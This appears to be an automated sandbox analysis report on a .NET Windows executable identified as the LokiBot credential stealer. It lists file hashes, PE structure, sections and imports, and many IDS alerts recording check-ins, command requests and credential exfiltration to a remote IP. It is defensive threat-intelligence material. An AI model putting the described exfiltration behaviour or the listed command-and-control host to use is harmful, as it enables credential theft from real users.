              SHA256:506acdbf6f6334fb4b7519e45d60f3c90b115853fa4b76d0670bf20698f4c7c4
              SHA512:c47796be2af02e5a3196402bbc893eeda7474c6e4bb418cecc0ac23a30ccecf0422ed36c66caac1662776aaeb2e97aaeb9bf5799b9a46d2f6fab9f8382d06035
              SSDEEP:3072:JvAqCj8Ebdnt7NQs5E8lToQGUWYpzyYTqWH8G+esk60AWQ8jp:9o88568qXUFpWI8G+060jQ8
              TLSH:5314CE71A2679721D55B5E39C49E300C12729F062653E71BE5CC33B90EF23CF2A1A956
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K..f..............0..............:... ...@....@.. ....................................`................................
              Icon Hash:1a5ada12a98c3689
              Entrypoint:0x423a2e
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x66EC1A4B [Thu Sep 19 12:34:19 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
              Instruction
              jmp dword ptr [00402000h]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x239e00x4b.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x10e64.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000xc.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x2399a0x1c.text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x20000x21a340x21c00f136068a9f052812e205e0271e8167d1False0.8641854745370371data7.690880893460008IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc0x240000x10e640x11000e6050757e28b3d8e4cd5378caa99beefFalse0.05656881893382353data2.6821527330566832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x360000xc0x200a7a36da172f070f0282f48ecf4712fe5False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0x241300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.046891636105524666
              RT_GROUP_ICON0x349580x14data1.15
              RT_VERSION0x3496c0x30cdata0.4230769230769231
              RT_MANIFEST0x34c780x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
              DLLImport
              mscoree.dll_CorExeMain
              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2024-09-25T10:19:02.551070+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749842TCP
              2024-09-25T10:19:08.211638+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749699188.114.97.380TCP
              2024-09-25T10:19:08.211638+02002025381ET MALWARE LokiBot Checkin1192.168.2.749699188.114.97.380TCP
              2024-09-25T10:19:08.211638+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749699188.114.97.380TCP
              2024-09-25T10:19:09.125494+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.749699188.114.97.380TCP
              2024-09-25T10:19:09.263458+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749700188.114.97.380TCP
              2024-09-25T10:19:09.263458+02002025381ET MALWARE LokiBot Checkin1192.168.2.749700188.114.97.380TCP
              2024-09-25T10:19:09.263458+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749700188.114.97.380TCP
              2024-09-25T10:19:09.982295+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.749700188.114.97.380TCP
              2024-09-25T10:19:10.062927+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749701188.114.97.380TCP
              2024-09-25T10:19:10.062927+02002025381ET MALWARE LokiBot Checkin1192.168.2.749701188.114.97.380TCP
              2024-09-25T10:19:10.062927+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749701188.114.97.380TCP
              2024-09-25T10:19:10.811770+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749701188.114.97.380TCP
              2024-09-25T10:19:10.811770+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749701188.114.97.380TCP
              2024-09-25T10:19:10.817841+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749701TCP
              2024-09-25T10:19:10.969314+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749702188.114.97.380TCP
              2024-09-25T10:19:10.969314+02002025381ET MALWARE LokiBot Checkin1192.168.2.749702188.114.97.380TCP
              2024-09-25T10:19:10.969314+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749702188.114.97.380TCP
              2024-09-25T10:19:11.665714+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749702188.114.97.380TCP
              2024-09-25T10:19:11.665714+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749702188.114.97.380TCP
              2024-09-25T10:19:11.670551+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749702TCP
              2024-09-25T10:19:11.837774+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749703188.114.97.380TCP
              2024-09-25T10:19:11.837774+02002025381ET MALWARE LokiBot Checkin1192.168.2.749703188.114.97.380TCP
              2024-09-25T10:19:11.837774+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749703188.114.97.380TCP
              2024-09-25T10:19:12.531180+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749703188.114.97.380TCP
              2024-09-25T10:19:12.531180+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749703188.114.97.380TCP
              2024-09-25T10:19:12.537084+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749703TCP
              2024-09-25T10:19:12.688864+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749704188.114.97.380TCP
              2024-09-25T10:19:12.688864+02002025381ET MALWARE LokiBot Checkin1192.168.2.749704188.114.97.380TCP
              2024-09-25T10:19:12.688864+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749704188.114.97.380TCP
              2024-09-25T10:19:13.453182+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749704188.114.97.380TCP
              2024-09-25T10:19:13.453182+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749704188.114.97.380TCP
              2024-09-25T10:19:13.460991+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749704TCP
              2024-09-25T10:19:13.615421+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749705188.114.97.380TCP
              2024-09-25T10:19:13.615421+02002025381ET MALWARE LokiBot Checkin1192.168.2.749705188.114.97.380TCP
              2024-09-25T10:19:13.615421+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749705188.114.97.380TCP
              2024-09-25T10:19:14.450457+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749705188.114.97.380TCP
              2024-09-25T10:19:14.450457+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749705188.114.97.380TCP
              2024-09-25T10:19:14.459844+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749705TCP
              2024-09-25T10:19:14.711569+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749706188.114.97.380TCP
              2024-09-25T10:19:14.711569+02002025381ET MALWARE LokiBot Checkin1192.168.2.749706188.114.97.380TCP
              2024-09-25T10:19:14.711569+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749706188.114.97.380TCP
              2024-09-25T10:19:15.399528+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749706188.114.97.380TCP
              2024-09-25T10:19:15.399528+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749706188.114.97.380TCP
              2024-09-25T10:19:15.404341+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749706TCP
              2024-09-25T10:19:15.581402+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749707188.114.97.380TCP
              2024-09-25T10:19:15.581402+02002025381ET MALWARE LokiBot Checkin1192.168.2.749707188.114.97.380TCP
              2024-09-25T10:19:15.581402+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749707188.114.97.380TCP
              2024-09-25T10:19:16.220301+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749707188.114.97.380TCP
              2024-09-25T10:19:16.220301+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749707188.114.97.380TCP
              2024-09-25T10:19:16.225141+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749707TCP
              2024-09-25T10:19:16.376989+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749708188.114.97.380TCP
              2024-09-25T10:19:16.376989+02002025381ET MALWARE LokiBot Checkin1192.168.2.749708188.114.97.380TCP
              2024-09-25T10:19:16.376989+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749708188.114.97.380TCP
              2024-09-25T10:19:17.022071+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749708188.114.97.380TCP
              2024-09-25T10:19:17.022071+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749708188.114.97.380TCP
              2024-09-25T10:19:17.026938+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749708TCP
              2024-09-25T10:19:17.178646+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749709188.114.97.380TCP
              2024-09-25T10:19:17.178646+02002025381ET MALWARE LokiBot Checkin1192.168.2.749709188.114.97.380TCP
              2024-09-25T10:19:17.178646+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749709188.114.97.380TCP
              2024-09-25T10:19:18.146657+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749709188.114.97.380TCP
              2024-09-25T10:19:18.146657+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749709188.114.97.380TCP
              2024-09-25T10:19:18.146905+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749709TCP
              2024-09-25T10:19:18.296157+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749710188.114.97.380TCP
              2024-09-25T10:19:18.296157+02002025381ET MALWARE LokiBot Checkin1192.168.2.749710188.114.97.380TCP
              2024-09-25T10:19:18.296157+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749710188.114.97.380TCP
              2024-09-25T10:19:18.987415+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749710188.114.97.380TCP
              2024-09-25T10:19:18.987415+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749710188.114.97.380TCP
              2024-09-25T10:19:18.992492+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749710TCP
              2024-09-25T10:19:19.154274+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749711188.114.97.380TCP
              2024-09-25T10:19:19.154274+02002025381ET MALWARE LokiBot Checkin1192.168.2.749711188.114.97.380TCP
              2024-09-25T10:19:19.154274+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749711188.114.97.380TCP
              2024-09-25T10:19:19.794940+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749711188.114.97.380TCP
              2024-09-25T10:19:19.794940+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749711188.114.97.380TCP
              2024-09-25T10:19:19.799882+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749711TCP
              2024-09-25T10:19:20.137435+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749712188.114.97.380TCP
              2024-09-25T10:19:20.137435+02002025381ET MALWARE LokiBot Checkin1192.168.2.749712188.114.97.380TCP
              2024-09-25T10:19:20.137435+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749712188.114.97.380TCP
              2024-09-25T10:19:20.899036+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749712188.114.97.380TCP
              2024-09-25T10:19:20.899036+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749712188.114.97.380TCP
              2024-09-25T10:19:20.903837+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749712TCP
              2024-09-25T10:19:21.053477+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749713188.114.97.380TCP
              2024-09-25T10:19:21.053477+02002025381ET MALWARE LokiBot Checkin1192.168.2.749713188.114.97.380TCP
              2024-09-25T10:19:21.053477+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749713188.114.97.380TCP
              2024-09-25T10:19:21.689404+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749713188.114.97.380TCP
              2024-09-25T10:19:21.689404+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749713188.114.97.380TCP
              2024-09-25T10:19:21.694245+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749713TCP
              2024-09-25T10:19:21.842648+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749714188.114.97.380TCP
              2024-09-25T10:19:21.842648+02002025381ET MALWARE LokiBot Checkin1192.168.2.749714188.114.97.380TCP
              2024-09-25T10:19:21.842648+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749714188.114.97.380TCP
              2024-09-25T10:19:22.552651+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749714188.114.97.380TCP
              2024-09-25T10:19:22.552651+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749714188.114.97.380TCP
              2024-09-25T10:19:22.570360+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749714TCP
              2024-09-25T10:19:22.855192+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749715188.114.97.380TCP
              2024-09-25T10:19:22.855192+02002025381ET MALWARE LokiBot Checkin1192.168.2.749715188.114.97.380TCP
              2024-09-25T10:19:22.855192+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749715188.114.97.380TCP
              2024-09-25T10:19:23.518806+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749715188.114.97.380TCP
              2024-09-25T10:19:23.518806+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749715188.114.97.380TCP
              2024-09-25T10:19:23.523583+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749715TCP
              2024-09-25T10:19:23.676953+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749718188.114.97.380TCP
              2024-09-25T10:19:23.676953+02002025381ET MALWARE LokiBot Checkin1192.168.2.749718188.114.97.380TCP
              2024-09-25T10:19:23.676953+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749718188.114.97.380TCP
              2024-09-25T10:19:24.365883+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749718188.114.97.380TCP
              2024-09-25T10:19:24.365883+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749718188.114.97.380TCP
              2024-09-25T10:19:24.370931+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749718TCP
              2024-09-25T10:19:24.570672+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749720188.114.97.380TCP
              2024-09-25T10:19:24.570672+02002025381ET MALWARE LokiBot Checkin1192.168.2.749720188.114.97.380TCP
              2024-09-25T10:19:24.570672+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749720188.114.97.380TCP
              2024-09-25T10:19:25.286543+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749720188.114.97.380TCP
              2024-09-25T10:19:25.286543+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749720188.114.97.380TCP
              2024-09-25T10:19:25.291419+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749720TCP
              2024-09-25T10:19:25.439700+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749723188.114.97.380TCP
              2024-09-25T10:19:25.439700+02002025381ET MALWARE LokiBot Checkin1192.168.2.749723188.114.97.380TCP
              2024-09-25T10:19:25.439700+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749723188.114.97.380TCP
              2024-09-25T10:19:27.092250+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749723188.114.97.380TCP
              2024-09-25T10:19:27.092250+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749723188.114.97.380TCP
              2024-09-25T10:19:27.096966+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749723TCP
              2024-09-25T10:19:27.269752+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749724188.114.97.380TCP
              2024-09-25T10:19:27.269752+02002025381ET MALWARE LokiBot Checkin1192.168.2.749724188.114.97.380TCP
              2024-09-25T10:19:27.269752+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749724188.114.97.380TCP
              2024-09-25T10:19:28.045248+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749724188.114.97.380TCP
              2024-09-25T10:19:28.045248+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749724188.114.97.380TCP
              2024-09-25T10:19:28.050244+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749724TCP
              2024-09-25T10:19:28.206792+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749725188.114.97.380TCP
              2024-09-25T10:19:28.206792+02002025381ET MALWARE LokiBot Checkin1192.168.2.749725188.114.97.380TCP
              2024-09-25T10:19:28.206792+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749725188.114.97.380TCP
              2024-09-25T10:19:28.881607+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749725188.114.97.380TCP
              2024-09-25T10:19:28.881607+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749725188.114.97.380TCP
              2024-09-25T10:19:28.886614+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749725TCP
              2024-09-25T10:19:29.037709+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749726188.114.97.380TCP
              2024-09-25T10:19:29.037709+02002025381ET MALWARE LokiBot Checkin1192.168.2.749726188.114.97.380TCP
              2024-09-25T10:19:29.037709+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749726188.114.97.380TCP
              2024-09-25T10:19:29.680830+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749726188.114.97.380TCP
              2024-09-25T10:19:29.680830+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749726188.114.97.380TCP
              2024-09-25T10:19:29.685693+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749726TCP
              2024-09-25T10:19:29.847888+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749727188.114.97.380TCP
              2024-09-25T10:19:29.847888+02002025381ET MALWARE LokiBot Checkin1192.168.2.749727188.114.97.380TCP
              2024-09-25T10:19:29.847888+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749727188.114.97.380TCP
              2024-09-25T10:19:30.583036+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749727188.114.97.380TCP
              2024-09-25T10:19:30.583036+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749727188.114.97.380TCP
              2024-09-25T10:19:30.588201+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749727TCP
              2024-09-25T10:19:30.733826+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749728188.114.97.380TCP
              2024-09-25T10:19:30.733826+02002025381ET MALWARE LokiBot Checkin1192.168.2.749728188.114.97.380TCP
              2024-09-25T10:19:30.733826+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749728188.114.97.380TCP
              2024-09-25T10:19:31.369595+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749728188.114.97.380TCP
              2024-09-25T10:19:31.369595+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749728188.114.97.380TCP
              2024-09-25T10:19:31.401029+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749728TCP
              2024-09-25T10:19:32.177777+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749729188.114.97.380TCP
              2024-09-25T10:19:32.177777+02002025381ET MALWARE LokiBot Checkin1192.168.2.749729188.114.97.380TCP
              2024-09-25T10:19:32.177777+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749729188.114.97.380TCP
              2024-09-25T10:19:32.827325+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749729188.114.97.380TCP
              2024-09-25T10:19:32.827325+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749729188.114.97.380TCP
              2024-09-25T10:19:32.832107+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749729TCP
              2024-09-25T10:19:32.989857+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749730188.114.97.380TCP
              2024-09-25T10:19:32.989857+02002025381ET MALWARE LokiBot Checkin1192.168.2.749730188.114.97.380TCP
              2024-09-25T10:19:32.989857+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749730188.114.97.380TCP
              2024-09-25T10:19:33.628049+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749730188.114.97.380TCP
              2024-09-25T10:19:33.628049+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749730188.114.97.380TCP
              2024-09-25T10:19:33.633464+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749730TCP
              2024-09-25T10:19:33.800027+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749731188.114.97.380TCP
              2024-09-25T10:19:33.800027+02002025381ET MALWARE LokiBot Checkin1192.168.2.749731188.114.97.380TCP
              2024-09-25T10:19:33.800027+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749731188.114.97.380TCP
              2024-09-25T10:19:34.467992+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749731188.114.97.380TCP
              2024-09-25T10:19:34.467992+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749731188.114.97.380TCP
              2024-09-25T10:19:34.472797+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749731TCP
              2024-09-25T10:19:34.631187+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749732188.114.97.380TCP
              2024-09-25T10:19:34.631187+02002025381ET MALWARE LokiBot Checkin1192.168.2.749732188.114.97.380TCP
              2024-09-25T10:19:34.631187+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749732188.114.97.380TCP
              2024-09-25T10:19:35.318075+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749732188.114.97.380TCP
              2024-09-25T10:19:35.318075+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749732188.114.97.380TCP
              2024-09-25T10:19:35.322924+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749732TCP
              2024-09-25T10:19:35.482687+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749733188.114.97.380TCP
              2024-09-25T10:19:35.482687+02002025381ET MALWARE LokiBot Checkin1192.168.2.749733188.114.97.380TCP
              2024-09-25T10:19:35.482687+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749733188.114.97.380TCP
              2024-09-25T10:19:36.366610+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749733188.114.97.380TCP
              2024-09-25T10:19:36.366610+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749733188.114.97.380TCP
              2024-09-25T10:19:36.371522+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749733TCP
              2024-09-25T10:19:36.537688+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749734188.114.97.380TCP
              2024-09-25T10:19:36.537688+02002025381ET MALWARE LokiBot Checkin1192.168.2.749734188.114.97.380TCP
              2024-09-25T10:19:36.537688+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749734188.114.97.380TCP
              2024-09-25T10:19:37.190467+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749734188.114.97.380TCP
              2024-09-25T10:19:37.190467+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749734188.114.97.380TCP
              2024-09-25T10:19:37.195299+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749734TCP
              2024-09-25T10:19:37.356070+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749735188.114.97.380TCP
              2024-09-25T10:19:37.356070+02002025381ET MALWARE LokiBot Checkin1192.168.2.749735188.114.97.380TCP
              2024-09-25T10:19:37.356070+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749735188.114.97.380TCP
